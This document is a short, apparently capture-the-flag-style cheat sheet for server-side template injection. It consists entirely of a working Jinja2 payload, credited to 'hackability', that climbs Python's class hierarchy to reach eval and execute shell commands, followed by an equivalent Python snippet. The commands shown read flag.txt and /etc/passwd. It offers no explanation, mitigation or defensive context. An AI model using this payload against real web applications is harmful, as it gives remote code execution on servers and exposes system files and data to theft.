SSTI(Server Side Template Injection) 

hackability's payload
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("cat flag.txt").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}


for c in [].__class__.__base__.__subclasses__():
	if c.__name__=='catch_warnings':
		for b in c.__init__.__globals__.values():
			if b.__class__ == {}.__class__:
				if 'eval' in b.keys():
					b['eval']('__import__("os").popen("cat /etc/passwd").read()')
